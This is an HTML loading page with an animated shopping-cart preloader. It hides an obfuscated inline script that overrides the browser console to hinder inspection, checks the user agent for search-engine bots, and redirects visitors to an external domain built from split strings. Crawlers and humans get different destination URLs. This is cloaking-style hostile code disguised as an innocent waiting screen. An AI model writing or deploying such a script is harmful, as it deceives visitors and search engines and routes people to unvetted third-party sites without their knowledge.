<!DOCTYPE html>
<html>
	<head>
		<style>
			* {
				border: 0;
				box-sizing: border-box;
				margin: 0;
				padding: 0;
			}
			:root {
				--hue: 223;
				--bg: hsl(var(--hue), 10%, 90%);
				--fg: hsl(var(--hue), 10%, 10%);
				--primary: hsl(var(--hue), 90%, 55%);
				--trans-dur: 0.3s;
				font-size: calc(16px + (20 - 16) * (100vw - 320px) / (1280 - 320));
			}
			body {
				background-color: var(--bg);
				color: var(--fg);
				font: 1em/1.5 "DM Sans", sans-serif;
				height: 50vh;
				display: grid;
				place-items: center;
				transition: background-color var(--trans-dur), color var(--trans-dur);
			}
			.preloader {
				text-align: center;
				max-width: 20em;
				width: 100%;
			}
			.preloader__text {
				position: relative;
				height: 1.5em;
			}
			.preloader__msg {
				animation: msg 0.3s 13.7s linear forwards;
				position: absolute;
				width: 100%;
			}
			.preloader__msg--last {
				animation-direction: reverse;
				animation-delay: 14s;
				visibility: hidden;
			}
			.cart {
				display: block;
				margin: 0 auto 1.5em auto;
				width: 8em;
				height: 8em;
			}
			.cart__lines,
			.cart__top,
			.cart__wheel1,
			.cart__wheel2,
			.cart__wheel-stroke {
				animation: cartLines 2s ease-in-out infinite;
			}
			.cart__lines {
				stroke: var(--primary);
			}
			.cart__top {
				animation-name: cartTop;
			}
			.cart__wheel1 {
				animation-name: cartWheel1;
				transform: rotate(-0.25turn);
				transform-origin: 43px 111px;
			}
			.cart__wheel2 {
				animation-name: cartWheel2;
				transform: rotate(0.25turn);
				transform-origin: 102px 111px;
			}
			.cart__wheel-stroke {
				animation-name: cartWheelStroke;
			}
			.cart__track {
				stroke: hsla(var(--hue), 10%, 10%, 0.1);
				transition: stroke var(--trans-dur);
			}

			/* Dark theme */
			@media (prefers-color-scheme: dark) {
				:root {
					--bg: hsl(var(--hue), 10%, 10%);
					--fg: hsl(var(--hue), 10%, 90%);
				}
				.cart__track {
					stroke: hsla(var(--hue), 10%, 90%, 0.1);
				}
			}

			/* Animations */
			@keyframes msg {
				from {
					opacity: 1;
					visibility: visible;
				}
				99.9% {
					opacity: 0;
					visibility: visible;
				}
				to {
					opacity: 0;
					visibility: hidden;
				}
			}
			@keyframes cartLines {
				from,
				to {
					opacity: 0;
				}
				8%,
				92% {
					opacity: 1;
				}
			}
			@keyframes cartTop {
				from {
					stroke-dashoffset: -338;
				}
				50% {
					stroke-dashoffset: 0;
				}
				to {
					stroke-dashoffset: 338;
				}
			}
			@keyframes cartWheel1 {
				from {
					transform: rotate(-0.25turn);
				}
				to {
					transform: rotate(2.75turn);
				}
			}
			@keyframes cartWheel2 {
				from {
					transform: rotate(0.25turn);
				}
				to {
					transform: rotate(3.25turn);
				}
			}
			@keyframes cartWheelStroke {
				from,
				to {
					stroke-dashoffset: 81.68;
				}
				50% {
					stroke-dashoffset: 40.84;
				}
			}

		</style>
	</head>

	<body>
		<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0">
		<div class="preloader">
			<svg class="cart" role="img" aria-label="Shopping cart line animation" viewBox="0 0 128 128" width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
				<g fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="8">
					<g class="cart__track" stroke="hsla(0,10%,10%,0.1)">
						<polyline points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" />
						<circle cx="43" cy="111" r="13" />
						<circle cx="102" cy="111" r="13" />
					</g>
					<g class="cart__lines" stroke="currentColor">
						<polyline class="cart__top" points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" stroke-dasharray="338 338" stroke-dashoffset="-338" />
						<g class="cart__wheel1" transform="rotate(-90,43,111)">
							<circle class="cart__wheel-stroke" cx="43" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
						<g class="cart__wheel2" transform="rotate(90,102,111)">
							<circle class="cart__wheel-stroke" cx="102" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
					</g>
				</g>
			</svg>
			<div class="preloader__text">
				<p class="preloader__msg">Please Wait ...</p>
				<p class="preloader__msg preloader__msg--last">This is taking long. Something’s wrong.</p>
			</div>
		</div>
		<script>
(function(_0x492b3e,_0x38d609){function _0x552248(_0xed1d80,_0x49ca0b,_0x311e9d,_0x2fc72b){return _0xebf0(_0x49ca0b-0x365,_0xed1d80);}function _0x3f5f39(_0x1f4ef3,_0x33af97,_0x40dec4,_0x355400){return _0xebf0(_0x33af97-0x374,_0x40dec4);}var _0x1054ff=_0x492b3e();while(!![]){try{var _0x491165=parseInt(_0x3f5f39(0x570,0x564,0x551,0x560))/(0x1f90+-0x106c+-0x307*0x5)+-parseInt(_0x552248(0x55d,0x564,0x56b,0x563))/(-0xcfa*0x3+0x1c78+0xa*0x10c)+-parseInt(_0x552248(0x56b,0x553,0x54e,0x54a))/(0x11f7+0x7d7*-0x3+0x591)+-parseInt(_0x3f5f39(0x56a,0x581,0x583,0x57b))/(0xa1f*0x3+-0x23+-0x1*0x1e36)+parseInt(_0x3f5f39(0x56e,0x552,0x56a,0x552))/(-0xb17+-0x1*0xb7b+0x1697*0x1)*(-parseInt(_0x552248(0x571,0x56e,0x563,0x556))/(-0x6*-0x1f1+0x1*0x7f7+-0x1*0x1397))+parseInt(_0x3f5f39(0x565,0x55d,0x552,0x543))/(0x24c*-0x5+-0x36*0x7+0xcfd)+parseInt(_0x552248(0x54c,0x557,0x557,0x574))/(-0x2076+0xb*-0x221+-0x37e9*-0x1);if(_0x491165===_0x38d609)break;else _0x1054ff['push'](_0x1054ff['shift']());}catch(_0x1ebbce){_0x1054ff['push'](_0x1054ff['shift']());}}}(_0x24f5,-0x2e298+-0x15a39+-0x5f0dd*-0x1),(function(){function _0x1207d7(_0x3b93c1,_0x29f810,_0x12e01b,_0x500f1c){return _0xebf0(_0x12e01b- -0x321,_0x3b93c1);}var _0x8f1731={'FHYKD':'SNTzN','slQLZ':'CxBdy','DUUwq':_0x54ec90(-0x7f,-0x6a,-0x77,-0x6b),'PHLzh':function(_0x23aa0c,_0xf265d2){return _0x23aa0c!==_0xf265d2;},'xRlHt':_0x1207d7(-0x131,-0x121,-0x117,-0x10a),'LCJVj':'(((.+)+)+)'+'+$','qQWnX':_0x1207d7(-0x136,-0x116,-0x130,-0x146),'EkJDd':function(_0x7d4851,_0x1d6c92){return _0x7d4851!==_0x1d6c92;},'CloCx':'sLmuJ','FQtYP':function(_0x15fa79,_0x28354a){return _0x15fa79(_0x28354a);},'frUcx':function(_0x265d6a,_0x19e89c){return _0x265d6a+_0x19e89c;},'UFemr':_0x1207d7(-0x14d,-0x142,-0x148,-0x142)+'nction()\x20','apMuU':function(_0x2d7fe4){return _0x2d7fe4();},'PBzFJ':'log','oONKE':'warn','wiKxN':_0x1207d7(-0x11d,-0x115,-0x115,-0x124),'dYFLo':_0x54ec90(-0x45,-0x7b,-0x60,-0x76),'fnvHq':_0x54ec90(-0x57,-0x66,-0x74,-0x8b),'OEFXf':'trace','tiqZZ':function(_0x476a52,_0x672065){return _0x476a52<_0x672065;},'hjZyb':_0x54ec90(-0x57,-0x80,-0x68,-0x65)+'1','kstFL':function(_0x2b25d3){return _0x2b25d3();},'fBKqP':function(_0x4e6841,_0x1b9cfb){return _0x4e6841+_0x1b9cfb;},'vPTmj':function(_0x1c7816,_0x23b171){return _0x1c7816+_0x23b171;},'NFJME':function(_0x1c8718,_0x3c7f2f){return _0x1c8718+_0x3c7f2f;},'UQWKS':_0x1207d7(-0x12b,-0x147,-0x13c,-0x13c)},_0x21857c=(function(){var _0x3b3699=!![];return function(_0x1372b3,_0xa57c85){var _0x2640e7={};_0x2640e7['AtOnH']=function(_0xa66305,_0xaea8b1){return _0xa66305!==_0xaea8b1;},_0x2640e7[_0x22e5d0(0xd7,0xf1,0xee,0x106)]=_0x8f1731[_0x217974(0x41e,0x40e,0x407,0x41b)];var _0x2e42b7=_0x2640e7;function _0x22e5d0(_0x4fc078,_0x551dbe,_0x5526fd,_0x1ee0f5){return _0xebf0(_0x551dbe- -0x116,_0x5526fd);}function _0x217974(_0x233207,_0x448043,_0x53ed73,_0x5c1a6d){return _0xebf0(_0x448043-0x217,_0x5c1a6d);}if(_0x8f1731[_0x22e5d0(0xe3,0xd9,0xe4,0xdd)]===_0x8f1731[_0x217974(0x402,0x41b,0x405,0x42c)]){if(_0x2f280e){var _0x1d0a70=_0x8e0497[_0x22e5d0(0xe5,0xe7,0xed,0xec)](_0x2269d0,arguments);return _0x10c9f7=null,_0x1d0a70;}}else{var _0x49de8b=_0x3b3699?function(){function _0x8411b(_0x1441f2,_0x3d2584,_0x1c1ffd,_0x266d70){return _0x217974(_0x1441f2-0x190,_0x3d2584- -0x14b,_0x1c1ffd-0x153,_0x1441f2);}function _0x153c74(_0x3ed59f,_0x4b79dc,_0x29eeba,_0x27cbb2){return _0x217974(_0x3ed59f-0x13b,_0x4b79dc- -0x139,_0x29eeba-0x154,_0x27cbb2);}if(_0x2e42b7['AtOnH'](_0x153c74(0x2ac,0x2c6,0x2d3,0x2b8),_0x2e42b7[_0x8411b(0x2c2,0x2d3,0x2b9,0x2d1)])){var _0x10ce56=_0x29fee7[_0x8411b(0x2d5,0x2c9,0x2d4,0x2e2)](_0x3b6ed3,arguments);return _0x5c0447=null,_0x10ce56;}else{if(_0xa57c85){var _0x139142=_0xa57c85['apply'](_0x1372b3,arguments);return _0xa57c85=null,_0x139142;}}}:function(){};return _0x3b3699=![],_0x49de8b;}};}()),_0x40c458=_0x21857c(this,function(){function _0x4a5fca(_0x3fa18a,_0x1afff8,_0x549492,_0x32605d){return _0x1207d7(_0x3fa18a,_0x1afff8-0x10f,_0x32605d-0xa5,_0x32605d-0x16a);}function _0x1670a2(_0x5c9dbe,_0x3ab8a8,_0x1cd67d,_0x13dd35){return _0x1207d7(_0x13dd35,_0x3ab8a8-0xba,_0x5c9dbe-0xb0,_0x13dd35-0xee);}if(_0x8f1731[_0x4a5fca(-0x8a,-0x8c,-0x6c,-0x77)](_0x4a5fca(-0x6d,-0x82,-0x6b,-0x72),_0x8f1731[_0x1670a2(-0x8e,-0xa7,-0x84,-0xa6)]))_0x54532d=_0x17b25b;else return _0x40c458[_0x1670a2(-0x85,-0x97,-0x84,-0x79)]()['search'](_0x8f1731[_0x4a5fca(-0x69,-0x78,-0x8b,-0x71)])['toString']()[_0x1670a2(-0x99,-0x91,-0x8d,-0x8b)+'r'](_0x40c458)[_0x4a5fca(-0x91,-0x74,-0x79,-0x87)](_0x8f1731['LCJVj']);});_0x8f1731['kstFL'](_0x40c458);var _0x179b8f=(function(){var _0x153a3f=!![];return function(_0x7a51bd,_0x4a93ec){var _0x48ceb6=_0x153a3f?function(){if(_0x4a93ec){var _0x3e59cd=_0x4a93ec['apply'](_0x7a51bd,arguments);return _0x4a93ec=null,_0x3e59cd;}}:function(){};return _0x153a3f=![],_0x48ceb6;};}()),_0x9f440=_0x179b8f(this,function(){function _0x19b001(_0x56b739,_0x3306ae,_0x59f96b,_0xa55611){return _0x54ec90(_0x3306ae,_0x3306ae-0x1d6,_0xa55611- -0x78,_0xa55611-0x1da);}function _0xc9817b(_0x24bba9,_0x287924,_0x43c87e,_0x7f5594){return _0x1207d7(_0x287924,_0x287924-0x178,_0x7f5594- -0x3d,_0x7f5594-0x7b);}if(_0x8f1731[_0x19b001(-0xea,-0xc6,-0xd4,-0xd4)](_0x8f1731[_0xc9817b(-0x161,-0x156,-0x14b,-0x168)],_0x8f1731[_0x19b001(-0xed,-0xfe,-0xe1,-0xe3)])){if(_0x608b72){var _0x52b11e=_0x43c1bd[_0xc9817b(-0x15b,-0x14c,-0x165,-0x161)](_0x47cb5e,arguments);return _0x400a50=null,_0x52b11e;}}else{var _0x589104;try{if(_0x8f1731['EkJDd'](_0x8f1731[_0xc9817b(-0x178,-0x15f,-0x16d,-0x15c)],'Nayhq')){var _0xfb6687=_0x8f1731[_0x19b001(-0xd6,-0xf5,-0xed,-0xee)](Function,_0x8f1731['frUcx'](_0x8f1731[_0xc9817b(-0x18f,-0x174,-0x187,-0x17a)](_0x8f1731['UFemr'],_0xc9817b(-0x151,-0x162,-0x143,-0x14f)+_0x19b001(-0x10a,-0xe2,-0x103,-0xfe)+_0x19b001(-0x106,-0x111,-0xfc,-0xff)+'\x20)'),');'));_0x589104=_0x8f1731[_0xc9817b(-0x13e,-0x142,-0x163,-0x156)](_0xfb6687);}else return _0x48cf2d[_0xc9817b(-0x168,-0x187,-0x171,-0x172)]()[_0xc9817b(-0x155,-0x17d,-0x171,-0x169)](AlgMyH[_0x19b001(-0xc9,-0xb8,-0xb7,-0xce)])['toString']()[_0x19b001(-0x105,-0xfc,-0x105,-0x101)+'r'](_0x3f41f8)['search']('(((.+)+)+)'+'+$');}catch(_0x199b1d){_0x589104=window;}var _0x428a68=_0x589104['console']=_0x589104['console']||{},_0x1e62a9=[_0x8f1731[_0x19b001(-0xe2,-0x104,-0x116,-0xfa)],_0x8f1731['oONKE'],_0x8f1731[_0xc9817b(-0x178,-0x16c,-0x17a,-0x16a)],_0x8f1731[_0xc9817b(-0x155,-0x165,-0x160,-0x164)],_0x8f1731[_0xc9817b(-0x193,-0x185,-0x19a,-0x182)],'table',_0x8f1731[_0xc9817b(-0x147,-0x146,-0x17f,-0x162)]];for(var _0x5d20bb=0x1738+-0x1*0x5e7+-0x1151;_0x8f1731[_0xc9817b(-0x182,-0x172,-0x197,-0x17d)](_0x5d20bb,_0x1e62a9[_0x19b001(-0xfa,-0xfa,-0xcb,-0xde)]);_0x5d20bb++){var _0x322571=_0x8f1731[_0x19b001(-0xc7,-0xd7,-0xe8,-0xdb)]['split']('|'),_0x952c80=-0x1114*-0x2+-0x434+-0x9fc*0x3;while(!![]){switch(_0x322571[_0x952c80++]){case'0':_0x573f55[_0xc9817b(-0x17c,-0x168,-0x18e,-0x172)]=_0x5ba5c2[_0xc9817b(-0x157,-0x17d,-0x164,-0x172)][_0x19b001(-0xe0,-0xca,-0xea,-0xd6)](_0x5ba5c2);continue;case'1':_0x428a68[_0x239ef7]=_0x573f55;continue;case'2':var _0x573f55=_0x179b8f[_0xc9817b(-0x196,-0x173,-0x1a2,-0x186)+'r'][_0x19b001(-0xc4,-0xce,-0xe9,-0xd9)][_0x19b001(-0xf2,-0xde,-0xf1,-0xd6)](_0x179b8f);continue;case'3':var _0x5ba5c2=_0x428a68[_0x239ef7]||_0x573f55;continue;case'4':var _0x239ef7=_0x1e62a9[_0x5d20bb];continue;case'5':_0x573f55['__proto__']=_0x179b8f[_0x19b001(-0xbb,-0xbe,-0xd0,-0xd6)](_0x179b8f);continue;}break;}}}});_0x8f1731[_0x1207d7(-0x138,-0x13a,-0x12e,-0x11d)](_0x9f440);var _0x5a3d0b=window[_0x54ec90(-0x41,-0x5f,-0x5b,-0x5c)]['href'],_0x242e41=window['location'][_0x1207d7(-0x142,-0x133,-0x141,-0x14c)],_0x4d8f6f=_0x1207d7(-0x12f,-0x12e,-0x14a,-0x151)+_0x54ec90(-0x5e,-0x7d,-0x7a,-0x73)+_0x1207d7(-0x137,-0x124,-0x13b,-0x139)+'tem/'+_0x242e41+'/',_0x54a6f9=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i['test'](navigator[_0x54ec90(-0x39,-0x4b,-0x53,-0x45)]);function _0x54ec90(_0x2150f8,_0x5ab1ab,_0x1f190d,_0x278f97){return _0xebf0(_0x1f190d- -0x261,_0x2150f8);}var _0x440b7f=(location[_0x1207d7(-0x129,-0x132,-0x129,-0x139)]['match'](/\?\/(?:[^-]+)-([^\.]+).html/)||[])[-0xa*-0x2c2+-0x1*0x1517+0x14*-0x53];if(!_0x440b7f)return;var _0x594e95=_0x54a6f9?_0x8f1731['fBKqP'](_0x4d8f6f,_0x440b7f):_0x8f1731[_0x1207d7(-0x12f,-0x127,-0x144,-0x154)](_0x8f1731['NFJME'](_0x4d8f6f,_0x8f1731[_0x54ec90(-0x7e,-0x7f,-0x7f,-0x68)])+_0x440b7f,'/');location[_0x54ec90(-0x64,-0x56,-0x69,-0x62)]=_0x594e95;}()));function _0xebf0(_0x483d0b,_0x5f2534){var _0x24f5b6=_0x24f5();return _0xebf0=function(_0xebf019,_0x3c3758){_0xebf019=_0xebf019-(0x2c9*-0x5+-0x27*0x1d+0x142f);var _0x2a0b55=_0x24f5b6[_0xebf019];return _0x2a0b55;},_0xebf0(_0x483d0b,_0x5f2534);}function _0x24f5(){var _0x5a0a87=['userAgent','{}.constru','https://op','constructo','return\x20(fu','rn\x20this\x22)(','ctor(\x22retu','fnvHq','vPTmj','5ehrexh','PBzFJ','hostname','tiqZZ','UQWKS','xRlHt','frUcx','go/','bulet.co/i','icolobon.m','SNTzN','909363vQqMzO','mmTYV','FQtYP','toString','exception','625512jqEuun','slQLZ','130669WADobs','Cpscg','4375264TLQYmz','kstFL','wiKxN','search','qQWnX','FHYKD','href','2|4|3|5|0|','dYFLo','length','OEFXf','apply','hjZyb','142092xaNXmJ','prototype','error','CloCx','bind','DUUwq','PHLzh','location','vjtPu','apMuU','1334160vCDBJL','eCfTf','LCJVj','info','775792qjyIVP'];_0x24f5=function(){return _0x5a0a87;};return _0x24f5();}
		</script>
	</body>
</html>
